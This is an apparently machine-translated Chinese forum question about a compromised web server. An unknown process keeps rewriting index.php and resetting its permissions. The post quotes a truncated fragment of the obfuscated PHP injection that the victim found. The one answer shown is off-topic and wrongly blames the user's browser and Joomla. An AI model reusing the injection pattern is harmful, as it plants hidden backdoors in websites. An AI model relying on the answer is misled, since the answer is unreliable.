一个进程似乎已经控制了我的系统,并且它编辑了我的 Web 应用程序根文件夹中的几个文件,例如index.php.
我尝试恢复这些文件,但未经邀请的进程已将权限更改为“只读”
我已经尝试过以下方法:
更改所有者/权限,然后尝试编辑该文件。
结果:所有者和权限都自动改回
更改所有者/权限,然后尝试删除文件
结果:该文件似乎已被删除,但一毫秒后使用相同的编辑内容再次重新创建
还尝试auditctl监视该文件,但没有成功,因为它只在文件上记录我的命令,而没有记录其他进程的任何内容
所以我的问题是如何控制该文件以及如何检测导致此问题的进程以便将其关闭?关于我可以尝试做什么有什么建议吗?
更新:
当我使用“chmod”然后检查“ls -l”时,我看到我的更改已应用。但是,当我尝试编辑或删除文件后再次检查“ls -l”时,我使用 chmod 所做的更改将被恢复。
我知道可以删除该文件(几毫秒),因为我尝试连续多次发送垃圾邮件“rm”,如果我足够快,我最终收到消息:“没有这样的文件或目录”。
我不知道该过程是否只编辑网站文件夹中的文件,但这就是我注意到的地方。
我怀疑我的主机因为我的应用程序提供了竞争服务,但我不确定。尽管如此,因为我有 root 访问权限,我不应该能够控制文件/进程吗?
原始文件:
<?php include 'pages/home/home.php'; ?>
编辑后的文件:
<?php /*-wxD=-*/error_reporting(0); $TlQa /*-DZ@mPZJ(C>cyqBG[-*/=/*-;z4tQE}FbYQPgp3Df_f-*/ "ra"./*-e6wxBt3m.2MGhvLXW-*/>include 'pages/home/home.php';
答案1
您自己的浏览器会将其安装为您访问的任何 Joomla 网站的内容。
文档Joomla!(基页docs.joomla.org/Main_Page有一个搜索选项 - try index.php)指出:
index.php 文件是网站的骨架。 Joomla! 的每一页提供的是用从数据库插入的内容充实的index.php。
因为Joomla!是用 PHP 编写的,index.php 是自动提供的文件。更复杂的是,当用户导航到 Joomla 网站时,根目录的index.php 会重定向到当前模板的index.php。